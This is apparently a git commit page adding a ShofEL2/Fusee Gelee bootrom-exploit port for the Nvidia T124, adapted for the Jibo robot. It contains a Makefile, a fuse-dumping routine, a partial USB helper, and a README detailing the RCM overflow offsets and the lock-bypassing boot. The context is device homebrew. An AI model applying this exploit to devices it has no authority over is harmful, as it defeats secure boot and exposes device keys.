Kevin/Jibo-Platform-Tools-OLD
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Shofel payloader source & prebuild for jib with some old payloads i had made

Browse Source 
these payloads may not work , i have no clue honestly i attached them ,
also there are 2 helper py scripts that might work with some of these
payloads
This commit is contained in:
Kevin
2026-03-03 22:16:28 +02:00
parent adc6be515d
commit a83ea3324f
118 changed files with 2605 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
Shofel4Jibo/.gitignore vendored Normal file
View File

@@ -0,0 +1,9 @@
*.bin
*.elf
build/
!*.keep
*.d
*.idb
.*.swp
*.o
shofel2_t124

27
Shofel4Jibo/LICENSE.fail0verflow Normal file
View File

@@ -0,0 +1,27 @@
// Copyright (c) 2018 Team fail0verflow. All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of fail0verflow nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

75
Shofel4Jibo/Makefile Normal file
View File

@@ -0,0 +1,75 @@
CFLAGS := -Wall -Werror -I include -MMD
BIN_FILES = reset_example.bin jtag_example.bin intermezzo.bin boot_bct.bin mem_dumper_usb_server.bin
all: shofel2_t124 $(BIN_FILES)
# --------- x86 ----------
CC_x86 = gcc
CFLAGS_x86 := $(CFLAGS)
# shameless copypasta from https://stackoverflow.com/a/2908351/375416
C_FILES_x86:= $(wildcard exploit/*.c)
OBJ_FILES_x86 := $(addprefix build/obj_x86/,$(notdir $(C_FILES_x86:.c=.o)))
-include $(OBJ_FILES_x86:.o=.d)
build/obj_x86/%.o: exploit/%.c
$(CC_x86) $(CFLAGS_x86) -c -o $@ $<
shofel2_t124: $(OBJ_FILES_x86)
$(CC_x86) $(CFLAGS_x86) -o $@ $^
# ------------------------
# ----- ARMv4t Thumb -----
TOOLCHAIN_ARM ?= arm-unknown-eabi-
CC_ARM = $(TOOLCHAIN_ARM)gcc
AS_ARM = $(TOOLCHAIN_ARM)as
OBJCOPY_ARM = $(TOOLCHAIN_ARM)objcopy
CFLAGS_ARM := $(CFLAGS) -march=armv4t -mthumb -Os -ffreestanding \
-fno-common -fomit-frame-pointer -nostdlib -fno-builtin-printf \
-fno-asynchronous-unwind-tables -fPIE -fno-builtin -fno-exceptions \
-Wl,--no-dynamic-linker,--build-id=none,-T,payloads/payload.ld -Wno-error -Wno-array-bounds -Wno-stringop-overflow
# shameless copypasta from https://stackoverflow.com/a/2908351/375416
C_FILES_ARM := $(wildcard payloads/*.c)
OBJ_FILES_ARM := $(addprefix build/obj_arm/,$(notdir $(C_FILES_ARM:.c=.o)))
-include $(OBJ_FILES_ARM:.o=.d)
build/obj_arm/%.o: payloads/%.c
$(CC_ARM) $(CFLAGS_ARM) -c -o $@ $<
build/reset_example.elf: build/obj_arm/reset_example.o
$(CC_ARM) $(CFLAGS_ARM) -o $@ $^
build/jtag_example.elf: build/obj_arm/jtag_example.o
$(CC_ARM) $(CFLAGS_ARM) -o $@ $^
build/boot_bct.elf: build/obj_arm/boot_bct.o
$(CC_ARM) $(CFLAGS_ARM) -o $@ $^
build/mem_dumper_usb_server.elf: build/obj_arm/mem_dumper_usb_server.o
$(CC_ARM) $(CFLAGS_ARM) -o $@ $^
build/intermezzo.elf: build/obj_arm/intermezzo.o
$(CC_ARM) $(CFLAGS_ARM) -o $@ $^
build/ipatch_rcm.elf: build/obj_arm/ipatch_rcm.o
$(CC_ARM) $(CFLAGS_ARM) -o $@ $^
%.bin: build/%.elf
$(OBJCOPY_ARM) -O binary $< $@
# ------------------------
clean:
rm -f $(OBJ_FILES_ARM) $(OBJ_FILES_x86)
rm -f shofel2_t124 build/*.elf $(BIN_FILES)
cleanall: clean
rm -f build/obj_arm/*.d build/obj_x86/*.d

69
Shofel4Jibo/README.md Normal file
View File

@@ -0,0 +1,69 @@
- - -
This is a prebuild binary (on arch , but you can build it yourself if you want) with the right
device id setup so it should just work out of the box as a basic payloader while im working on a
custom one with logging
- - -
# ShofEL2 for T124
This is a Fusee Gelee / ShofEL2 exploit port for the Nvidia T124 (a.k.a Jetson TK1, Shield K1, etc).
Currently this code allows you to download and execute a payload to the T124, dump the fuses and memory and boot bct without apply the locks.
Mostly of my code is based on the original ShofEL2 code and Katherine Temkin research, so I cannot take that much credit for this.
See the original fail0verflow blog post: https://fail0verflow.com/blog/2018/shofel2/
See additional info at the original Katherine Temkin github: https://github.com/Qyriad/fusee-launcher/blob/master/report/fusee_gelee.md
## Obligatory disclaimer
This code is provided without any warranty, use under your own resposability.
## Usage
You need an arm-*-eabi toolkit. You can use [Crosstool-ng](https://crosstool-ng.github.io/download/) compile it.
Build the loader and payloads:
$ cd ShofEL2-for-T124
$ make
Usage
$ ./shofel2_t124 ( MEM_DUMP | READ_FUSES | BOOT_BCT | PAYLOAD ) [options]
$ MEM_DUMP address length out_file -> Dumps "length" bytes starting from "address" to "out_file".
$ READ_FUSES out_file -> Dumps the T124 fuses to "out_file" and show them in console.
$ BOOT_BCT -> Boots BCT without applying locks.
$ PAYLOAD payload.bin [arm|thumb] -> Boots "payload.bin" the entrymode mode can be specified (thumb by default)
## Interesting facts (maybe some of them wrong)
* RCM loads the payload to IRAM at 0x4000E000 (described on tegrarcm source code).
* RCM cmd format is sligitly different. RCM cmd header length is 0x284 bytes but the firtst 4 bytes still containing the RCM cmd length.
* RCM cmd length restrictions are different to X1 bootrom:
* Bulk transfers need to be multiply of 0x1000 to ensure use the whole usb buffer.
* RCM cmd length minus 0x284 (header length) must be a multiple of 0x10 (which means RCM CMD length needs to end in 4).
* RCM cmd min length is 0x404 bytes. Due to the previous condition the minimun length would be 0x1004.
* RCM cmd length cannot exceed avaiable IRAM for the payload (from 0x4000E000 till 0x4003FFFF).
* With all this in mind max RCM cmd length is 0x32274 bytes.
* Since the exploit uses usb buffer 2, only 0x31000 bytes can be used for the payload in order to avoid finishing the RCM cmd.
* A payload can still be loaded using the same path as the one used by the original shofEL2, since no validation is carried out till the whole payload is received.
* Even if the specs says that the JTAG is enabled by default, cold bootrom code disasbles it while is runnig (not as dumb as expected :D).
* RCM runs on an ARM7TDMI core, I manage to halt the CPU on uboot using a Segger J-LINK.
* When the poisoned get status is executed, 0x30C bytes will be copied before the payload. These bytes are part of the execution stack, starting with the USB status var.
* Using the original sanity_check function from shofel2, I got from the execution stack that the RCM USB buffers are located at 0x40004000 and 0x40008000.
* Two USB buffers of 0x1000 bytes still present. They still alternating on each USB txn. And odd number of USB txn will let you on the hight buffer for the next txn.
* Using the original sanity_check function from shofel2, I got from the execution stack that the memcpy return address is located at 0x4000DCD8 (0x4000DCF4 - 0xC - 2 * 4 - 2 * 4).
* The position in the RCM cmd where the entry adress need to be write to smash the memcpy return address is calculated as follow:
* n_bytes_to_copy = 0x4000DCD8 - 0x40008000 (memcpy_ret_add_loc - usb_buf2_add) -> n_bytes_to_copy = 0x5CD8 bytes
* pos_in_payload = n_bytes_to_copy - 0x30C (copied from the execution stack) - 0x4 -> pos_in_payload = 0x59C8
* pos_in_rcm_cmd = pos_in_payload + 0x284 (header length) -> pos_in_rcm_cmd = 0x5C4C
* I found the following functions on the the bootrom:
| Function | IROM Address | Description |
| ------------- | ------------- | ------------- |
| void ep1_in_write_imm(void *buffer, u32 size, u32 *num_xfer) | 0x001065C0 | Writes EP1_IN |
| void ep1_out_read_imm(void *buffer, u32 size, u32 *num_xfer) | 0x00106612 | Reads EP1_OUT |
| void do_bct_boot() | 0x00100624 | Boots BCT without applying locks. |

1
Shofel4Jibo/bkp/compile_uboot4jibo.sh Normal file
View File

@@ -0,0 +1 @@
make ARCH=arm CROSS_COMPILE=arm-none-eabi-

5
Shofel4Jibo/bkp/pushUboot2jibo.sh Executable file
View File

@@ -0,0 +1,5 @@
cd ..
sudo ./shofel2_t124 PAYLOAD u-boot/spl/u-boot-spl.bin arm
cd u-boot/

23
Shofel4Jibo/config/gdbinit Normal file
View File

@@ -0,0 +1,23 @@
# J-LINK GDB SERVER initialization
#
# This connects to a GDB Server listening
# for commands on localhost at tcp port 2331
target remote localhost:2331
# Set JTAG speed to 30 kHz
monitor speed 4
# Set GDBServer to little endian
monitor endian little
# Reset the chip to get to a known state.
monitor reset
#
# CPU core initialization (to be done by user)
#
# Set the processor mode (Enables THUMB)
monitor reg cpsr = 0xf3
# Set auto JTAG speed
monitor speed auto
# Setup GDB FOR FASTER DOWNLOADS
set remote memory-write-packet-size 1024
set remote memory-write-packet-size fixed
# Load the program executable called "reset_example.elf"
load reset_example.elf

138
Shofel4Jibo/exploit/fuse.c Normal file
View File

@@ -0,0 +1,138 @@
// Copy paste from https://github.com/moriczgergo/moonflower/blob/933ab9ef66b76aa49ad2c29ca88d78173a81eff2/src/fuse.h
#include "fuse.h"
void print_fuses( fuse_chip_registers_t *fuse_chip_registers ) {
// don't worry, i didn't type these in by hand.
printf( "FUSE_PRODUCTION_MODE: %08x\n", fuse_chip_registers->FUSE_PRODUCTION_MODE );
printf( "FUSE_JTAG_SECUREID_VALID: %08x\n", fuse_chip_registers->FUSE_JTAG_SECUREID_VALID );
printf( "FUSE_ODM_LOCK: %08x\n", fuse_chip_registers->FUSE_ODM_LOCK );
printf( "FUSE_OPT_OPENGL_EN: %08x\n", fuse_chip_registers->FUSE_OPT_OPENGL_EN );
printf( "FUSE_SKU_INFO: %08x\n", fuse_chip_registers->FUSE_SKU_INFO );
printf( "FUSE_CPU_SPEEDO_0_CALIB: %08x\n", fuse_chip_registers->FUSE_CPU_SPEEDO_0_CALIB );
printf( "FUSE_CPU_IDDQ_CALIB: %08x\n", fuse_chip_registers->FUSE_CPU_IDDQ_CALIB );
printf( "RESERVED_0x01C: %08x\n", fuse_chip_registers->RESERVED_0x01C );
printf( "RESERVED_0x020: %08x\n", fuse_chip_registers->RESERVED_0x020 );
printf( "RESERVED_0x024: %08x\n", fuse_chip_registers->RESERVED_0x024 );
printf( "FUSE_OPT_FT_REV: %08x\n", fuse_chip_registers->FUSE_OPT_FT_REV );
printf( "FUSE_CPU_SPEEDO_1_CALIB: %08x\n", fuse_chip_registers->FUSE_CPU_SPEEDO_1_CALIB );
printf( "FUSE_CPU_SPEEDO_2_CALIB: %08x\n", fuse_chip_registers->FUSE_CPU_SPEEDO_2_CALIB );
printf( "FUSE_SOC_SPEEDO_0_CALIB: %08x\n", fuse_chip_registers->FUSE_SOC_SPEEDO_0_CALIB );
printf( "FUSE_SOC_SPEEDO_1_CALIB: %08x\n", fuse_chip_registers->FUSE_SOC_SPEEDO_1_CALIB );
printf( "FUSE_SOC_SPEEDO_2_CALIB: %08x\n", fuse_chip_registers->FUSE_SOC_SPEEDO_2_CALIB );
printf( "FUSE_SOC_IDDQ_CALIB: %08x\n", fuse_chip_registers->FUSE_SOC_IDDQ_CALIB );
printf( "RESERVED_0x044: %08x\n", fuse_chip_registers->RESERVED_0x044 );
printf( "FUSE_FA: %08x\n", fuse_chip_registers->FUSE_FA );
printf( "FUSE_RESERVED_PRODUCTION: %08x\n", fuse_chip_registers->FUSE_RESERVED_PRODUCTION );
printf( "FUSE_HDMI_LANE0_CALIB: %08x\n", fuse_chip_registers->FUSE_HDMI_LANE0_CALIB );
printf( "FUSE_HDMI_LANE1_CALIB: %08x\n", fuse_chip_registers->FUSE_HDMI_LANE1_CALIB );
printf( "FUSE_HDMI_LANE2_CALIB: %08x\n", fuse_chip_registers->FUSE_HDMI_LANE2_CALIB );
printf( "FUSE_HDMI_LANE3_CALIB: %08x\n", fuse_chip_registers->FUSE_HDMI_LANE3_CALIB );
printf( "FUSE_ENCRYPTION_RATE: %08x\n", fuse_chip_registers->FUSE_ENCRYPTION_RATE );
printf( "FUSE_PUBLIC_KEY 0-3: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_PUBLIC_KEY[0], fuse_chip_registers->FUSE_PUBLIC_KEY[1], fuse_chip_registers->FUSE_PUBLIC_KEY[2], fuse_chip_registers->FUSE_PUBLIC_KEY[3] );
printf( "FUSE_PUBLIC_KEY 4-7: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_PUBLIC_KEY[4], fuse_chip_registers->FUSE_PUBLIC_KEY[5], fuse_chip_registers->FUSE_PUBLIC_KEY[6], fuse_chip_registers->FUSE_PUBLIC_KEY[7] );
printf( "FUSE_TSENSOR1_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR1_CALIB );
printf( "FUSE_TSENSOR2_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR2_CALIB );
printf( "RESERVED_0x08C: %08x\n", fuse_chip_registers->RESERVED_0x08C );
printf( "FUSE_OPT_CP_REV: %08x\n", fuse_chip_registers->FUSE_OPT_CP_REV );
printf( "FUSE_OPT_PFG: %08x\n", fuse_chip_registers->FUSE_OPT_PFG );
printf( "FUSE_TSENSOR0_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR0_CALIB );
printf( "FUSE_BOOTROM_PATCH_SIZE: %08x\n", fuse_chip_registers->FUSE_BOOTROM_PATCH_SIZE );
printf( "FUSE_SECURITY_MODE: %08x\n", fuse_chip_registers->FUSE_SECURITY_MODE );
printf( "FUSE_PRIVATE_KEY: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_PRIVATE_KEY[0], fuse_chip_registers->FUSE_PRIVATE_KEY[1], fuse_chip_registers->FUSE_PRIVATE_KEY[2], fuse_chip_registers->FUSE_PRIVATE_KEY[3] );
printf( "FUSE_DEVICE_KEY: %08x\n", fuse_chip_registers->FUSE_DEVICE_KEY );
printf( "FUSE_ARM_DEBUG_DIS: %08x\n", fuse_chip_registers->FUSE_ARM_DEBUG_DIS );
printf( "FUSE_BOOT_DEVICE_INFO: %08x\n", fuse_chip_registers->FUSE_BOOT_DEVICE_INFO );
printf( "FUSE_RESERVED_SW: %08x\n", fuse_chip_registers->FUSE_RESERVED_SW );
printf( "FUSE_VP8_ENABLE: %08x\n", fuse_chip_registers->FUSE_VP8_ENABLE );
printf( "FUSE_RESERVED_ODM 0-3: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_RESERVED_ODM[0], fuse_chip_registers->FUSE_RESERVED_ODM[1], fuse_chip_registers->FUSE_RESERVED_ODM[2], fuse_chip_registers->FUSE_RESERVED_ODM[3] );
printf( "FUSE_RESERVED_ODM 4-7: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_RESERVED_ODM[4], fuse_chip_registers->FUSE_RESERVED_ODM[5], fuse_chip_registers->FUSE_RESERVED_ODM[6], fuse_chip_registers->FUSE_RESERVED_ODM[7] );
printf( "FUSE_OBS_DIS: %08x\n", fuse_chip_registers->FUSE_OBS_DIS );
printf( "RESERVED_0x0EC: %08x\n", fuse_chip_registers->RESERVED_0x0EC );
printf( "FUSE_USB_CALIB: %08x\n", fuse_chip_registers->FUSE_USB_CALIB );
printf( "FUSE_SKU_DIRECT_CONFIG: %08x\n", fuse_chip_registers->FUSE_SKU_DIRECT_CONFIG );
printf( "FUSE_KFUSE_PRIVKEY_CTRL: %08x\n", fuse_chip_registers->FUSE_KFUSE_PRIVKEY_CTRL );
printf( "FUSE_PACKAGE_INFO: %08x\n", fuse_chip_registers->FUSE_PACKAGE_INFO );
printf( "FUSE_OPT_VENDOR_CODE: %08x\n", fuse_chip_registers->FUSE_OPT_VENDOR_CODE );
printf( "FUSE_OPT_FAB_CODE: %08x\n", fuse_chip_registers->FUSE_OPT_FAB_CODE );
printf( "FUSE_OPT_LOT_CODE_0: %08x\n", fuse_chip_registers->FUSE_OPT_LOT_CODE_0 );
printf( "FUSE_OPT_LOT_CODE_1: %08x\n", fuse_chip_registers->FUSE_OPT_LOT_CODE_1 );
printf( "FUSE_OPT_WAFER_ID: %08x\n", fuse_chip_registers->FUSE_OPT_WAFER_ID );
printf( "FUSE_OPT_X_COORDINATE: %08x\n", fuse_chip_registers->FUSE_OPT_X_COORDINATE );
printf( "FUSE_OPT_Y_COORDINATE: %08x\n", fuse_chip_registers->FUSE_OPT_Y_COORDINATE );
printf( "FUSE_OPT_SEC_DEBUG_EN: %08x\n", fuse_chip_registers->FUSE_OPT_SEC_DEBUG_EN );
printf( "FUSE_OPT_OPS_RESERVED: %08x\n", fuse_chip_registers->FUSE_OPT_OPS_RESERVED );
printf( "FUSE_SATA_CALIB: %08x\n", fuse_chip_registers->FUSE_SATA_CALIB );
printf( "FUSE_GPU_IDDQ_CALIB: %08x\n", fuse_chip_registers->FUSE_GPU_IDDQ_CALIB );
printf( "FUSE_TSENSOR3_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR3_CALIB );
printf( "FUSE_SKU_BOND_OUT_L: %08x\n", fuse_chip_registers->FUSE_SKU_BOND_OUT_L );
printf( "FUSE_SKU_BOND_OUT_H: %08x\n", fuse_chip_registers->FUSE_SKU_BOND_OUT_H );
printf( "FUSE_SKU_BOND_OUT_U: %08x\n", fuse_chip_registers->FUSE_SKU_BOND_OUT_U );
printf( "FUSE_SKU_BOND_OUT_V: %08x\n", fuse_chip_registers->FUSE_SKU_BOND_OUT_V );
printf( "FUSE_SKU_BOND_OUT_W: %08x\n", fuse_chip_registers->FUSE_SKU_BOND_OUT_W );
printf( "RESERVED_0x144: %08x\n", fuse_chip_registers->RESERVED_0x144 );
printf( "FUSE_OPT_SUBREVISION: %08x\n", fuse_chip_registers->FUSE_OPT_SUBREVISION );
printf( "FUSE_OPT_SW_RESERVED_0: %08x\n", fuse_chip_registers->FUSE_OPT_SW_RESERVED_0 );
printf( "FUSE_OPT_SW_RESERVED_1: %08x\n", fuse_chip_registers->FUSE_OPT_SW_RESERVED_1 );
printf( "FUSE_TSENSOR4_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR4_CALIB );
printf( "FUSE_TSENSOR5_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR5_CALIB );
printf( "FUSE_TSENSOR6_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR6_CALIB );
printf( "FUSE_TSENSOR7_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR7_CALIB );
printf( "FUSE_OPT_PRIV_SEC_EN: %08x\n", fuse_chip_registers->FUSE_OPT_PRIV_SEC_EN );
printf( "FUSE_PKC_DISABLE: %08x\n", fuse_chip_registers->FUSE_PKC_DISABLE );
printf( "RESERVED_0x16C: %08x\n", fuse_chip_registers->RESERVED_0x16C );
printf( "RESERVED_0x170: %08x\n", fuse_chip_registers->RESERVED_0x170 );
printf( "RESERVED_0x174: %08x\n", fuse_chip_registers->RESERVED_0x174 );
printf( "RESERVED_0x178: %08x\n", fuse_chip_registers->RESERVED_0x178 );
printf( "FUSE_FUSE2TSEC_DEBUG_DISABLE: %08x\n", fuse_chip_registers->FUSE_FUSE2TSEC_DEBUG_DISABLE );
printf( "FUSE_TSENSOR8_CALIB: %08x\n", fuse_chip_registers->FUSE_TSENSOR8_CALIB );
printf( "FUSE_OPT_CP_BIN: %08x\n", fuse_chip_registers->FUSE_OPT_CP_BIN );
printf( "FUSE_OPT_GPU_FS: %08x\n", fuse_chip_registers->FUSE_OPT_GPU_FS );
printf( "FUSE_OPT_FT_BIN: %08x\n", fuse_chip_registers->FUSE_OPT_FT_BIN );
printf( "RESERVED_0x190: %08x\n", fuse_chip_registers->RESERVED_0x190 );
printf( "FUSE_SKU_BOND_OUT_X: %08x\n", fuse_chip_registers->FUSE_SKU_BOND_OUT_X );
printf( "FUSE_APB2JTAG_DISABLE: %08x\n", fuse_chip_registers->FUSE_APB2JTAG_DISABLE );
printf( "RESERVED_0x19C: %08x\n", fuse_chip_registers->RESERVED_0x19C );
printf( "FUSE_PHY_FLOORSWEEP: %08x\n", fuse_chip_registers->FUSE_PHY_FLOORSWEEP );
printf( "FUSE_PHY_FLOOR_ENABLE: %08x\n", fuse_chip_registers->FUSE_PHY_FLOOR_ENABLE );
printf( "FUSE_ARM_CRYPT_DE_FEATURE: %08x\n", fuse_chip_registers->FUSE_ARM_CRYPT_DE_FEATURE );
printf( "FUSE_DENVER_MTS_DE_FEATURE: %08x\n", fuse_chip_registers->FUSE_DENVER_MTS_DE_FEATURE );
printf( "FUSE_DIE_VERSION_OVERRIDE: %08x\n", fuse_chip_registers->FUSE_DIE_VERSION_OVERRIDE );
printf( "FUSE_TRIMMERS: %08x\n", fuse_chip_registers->FUSE_TRIMMERS );
printf( "FUSE_DENVER_BOOT_SEC: %08x\n", fuse_chip_registers->FUSE_DENVER_BOOT_SEC );
printf( "FUSE_DENVER_DFD_ACCESS: %08x\n", fuse_chip_registers->FUSE_DENVER_DFD_ACCESS );
printf( "FUSE_WOA_SKU_FLAG: %08x\n", fuse_chip_registers->FUSE_WOA_SKU_FLAG );
printf( "FUSE_ECO_RESERVE_1: %08x\n", fuse_chip_registers->FUSE_ECO_RESERVE_1 );
printf( "FUSE_GCPLEX_CONFIG_FUSE: %08x\n", fuse_chip_registers->FUSE_GCPLEX_CONFIG_FUSE );
printf( "RESERVED_0x1CC: %08x\n", fuse_chip_registers->RESERVED_0x1CC );
printf( "RESERVED_0x1D0: %08x\n", fuse_chip_registers->RESERVED_0x1D0 );
printf( "RESERVED_0x1D4: %08x\n", fuse_chip_registers->RESERVED_0x1D4 );
printf( "RESERVED_0x1D8: %08x\n", fuse_chip_registers->RESERVED_0x1D8 );
printf( "RESERVED_0x1DC: %08x\n", fuse_chip_registers->RESERVED_0x1DC );
printf( "RESERVED_0x1E0: %08x\n", fuse_chip_registers->RESERVED_0x1E0 );
printf( "RESERVED_0x1E4: %08x\n", fuse_chip_registers->RESERVED_0x1E4 );
printf( "RESERVED_0x1E8: %08x\n", fuse_chip_registers->RESERVED_0x1E8 );
printf( "RESERVED_0x1EC: %08x\n", fuse_chip_registers->RESERVED_0x1EC );
printf( "RESERVED_0x1F0: %08x\n", fuse_chip_registers->RESERVED_0x1F0 );
printf( "RESERVED_0x1F4: %08x\n", fuse_chip_registers->RESERVED_0x1F4 );
printf( "RESERVED_0x1F8: %08x\n", fuse_chip_registers->RESERVED_0x1F8 );
printf( "FUSE_SPARE_REALIGNMENT_REG: %08x\n", fuse_chip_registers->FUSE_SPARE_REALIGNMENT_REG );
printf( "FUSE_SPARE_BITS 00-03: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[ 0], fuse_chip_registers->FUSE_SPARE_BITS[ 1], fuse_chip_registers->FUSE_SPARE_BITS[ 2], fuse_chip_registers->FUSE_SPARE_BITS[ 3] );
printf( "FUSE_SPARE_BITS 04-07: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[ 4], fuse_chip_registers->FUSE_SPARE_BITS[ 5], fuse_chip_registers->FUSE_SPARE_BITS[ 6], fuse_chip_registers->FUSE_SPARE_BITS[ 7] );
printf( "FUSE_SPARE_BITS 08-11: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[ 8], fuse_chip_registers->FUSE_SPARE_BITS[ 9], fuse_chip_registers->FUSE_SPARE_BITS[10], fuse_chip_registers->FUSE_SPARE_BITS[11] );
printf( "FUSE_SPARE_BITS 12-15: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[12], fuse_chip_registers->FUSE_SPARE_BITS[13], fuse_chip_registers->FUSE_SPARE_BITS[14], fuse_chip_registers->FUSE_SPARE_BITS[15] );
printf( "FUSE_SPARE_BITS 16-19: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[16], fuse_chip_registers->FUSE_SPARE_BITS[17], fuse_chip_registers->FUSE_SPARE_BITS[18], fuse_chip_registers->FUSE_SPARE_BITS[19] );
printf( "FUSE_SPARE_BITS 20-23: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[20], fuse_chip_registers->FUSE_SPARE_BITS[21], fuse_chip_registers->FUSE_SPARE_BITS[22], fuse_chip_registers->FUSE_SPARE_BITS[23] );
printf( "FUSE_SPARE_BITS 24-27: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[24], fuse_chip_registers->FUSE_SPARE_BITS[25], fuse_chip_registers->FUSE_SPARE_BITS[26], fuse_chip_registers->FUSE_SPARE_BITS[27] );
printf( "FUSE_SPARE_BITS 28-31: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[28], fuse_chip_registers->FUSE_SPARE_BITS[29], fuse_chip_registers->FUSE_SPARE_BITS[30], fuse_chip_registers->FUSE_SPARE_BITS[31] );
printf( "FUSE_SPARE_BITS 32-35: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[32], fuse_chip_registers->FUSE_SPARE_BITS[33], fuse_chip_registers->FUSE_SPARE_BITS[34], fuse_chip_registers->FUSE_SPARE_BITS[35] );
printf( "FUSE_SPARE_BITS 36-39: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[36], fuse_chip_registers->FUSE_SPARE_BITS[37], fuse_chip_registers->FUSE_SPARE_BITS[38], fuse_chip_registers->FUSE_SPARE_BITS[39] );
printf( "FUSE_SPARE_BITS 40-43: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[40], fuse_chip_registers->FUSE_SPARE_BITS[41], fuse_chip_registers->FUSE_SPARE_BITS[42], fuse_chip_registers->FUSE_SPARE_BITS[43] );
printf( "FUSE_SPARE_BITS 44-47: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[44], fuse_chip_registers->FUSE_SPARE_BITS[45], fuse_chip_registers->FUSE_SPARE_BITS[46], fuse_chip_registers->FUSE_SPARE_BITS[47] );
printf( "FUSE_SPARE_BITS 48-51: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[48], fuse_chip_registers->FUSE_SPARE_BITS[49], fuse_chip_registers->FUSE_SPARE_BITS[50], fuse_chip_registers->FUSE_SPARE_BITS[51] );
printf( "FUSE_SPARE_BITS 52-55: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[52], fuse_chip_registers->FUSE_SPARE_BITS[53], fuse_chip_registers->FUSE_SPARE_BITS[54], fuse_chip_registers->FUSE_SPARE_BITS[55] );
printf( "FUSE_SPARE_BITS 56-59: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[56], fuse_chip_registers->FUSE_SPARE_BITS[57], fuse_chip_registers->FUSE_SPARE_BITS[58], fuse_chip_registers->FUSE_SPARE_BITS[59] );
printf( "FUSE_SPARE_BITS 60-63: %08x %08x %08x %08x\n", fuse_chip_registers->FUSE_SPARE_BITS[60], fuse_chip_registers->FUSE_SPARE_BITS[61], fuse_chip_registers->FUSE_SPARE_BITS[62], fuse_chip_registers->FUSE_SPARE_BITS[63] );
}

173
Shofel4Jibo/exploit/mini_libusb.c Normal file
View File

@@ -0,0 +1,173 @@
#include "mini_libusb.h"
#define SYSFS_MOUNT_PATH "/sys"
#define SYSFS_DEVICE_PATH SYSFS_MOUNT_PATH "/bus/usb/devices"
struct setup_data {
uint8_t bRequestType;
uint8_t bRequest;
uint16_t wValue;
uint16_t wIndex;
uint16_t wLength;
uint8_t data[];
};
int usb_get_att(uint16_t *val, char *d_name, char *attr, int base) {
int ret = -1;
char filepath[256];
char attr_buf[20];
int attr_fd;
snprintf(filepath, sizeof(filepath), SYSFS_DEVICE_PATH "/%s/%s", d_name, attr);
attr_fd = open(filepath, O_RDONLY);
if (attr_fd < 0) {
DEBUG_MSG( "Usb %s: %s attribute not found.\n", d_name, attr );
goto exit;
}
if ( !read(attr_fd, attr_buf, sizeof(attr_buf)) ) {
DEBUG_MSG( "Usb %s: couldn't read %s.\n", d_name, attr );
goto exit;
}
*val = (uint16_t) strtol(attr_buf, NULL, base);
ret = 0;
exit:
close(attr_fd);
return ret;
}
int usb_find_path_by_vid_pid( char *path, uint16_t vid, uint16_t pid ) {
int ret = -1;
uint16_t d_vid, d_pid, d_bus, d_num;
DIR *devices = opendir( SYSFS_DEVICE_PATH );
struct dirent *entry;
if ( !devices ) {
fprintf( stderr, "Critical Error: Sysfs not avaiable." );
return 1;
}
while ( ( entry = readdir( devices ) ) ) {
if ( !isdigit( entry->d_name[0] ) || strchr( entry->d_name, ':' ) )
continue;
if ( !usb_get_att( &d_vid, entry->d_name, "idVendor", 16 ) && ( vid == d_vid ) &&
!usb_get_att( &d_pid, entry->d_name, "idProduct", 16 ) && ( pid == d_pid ) &&
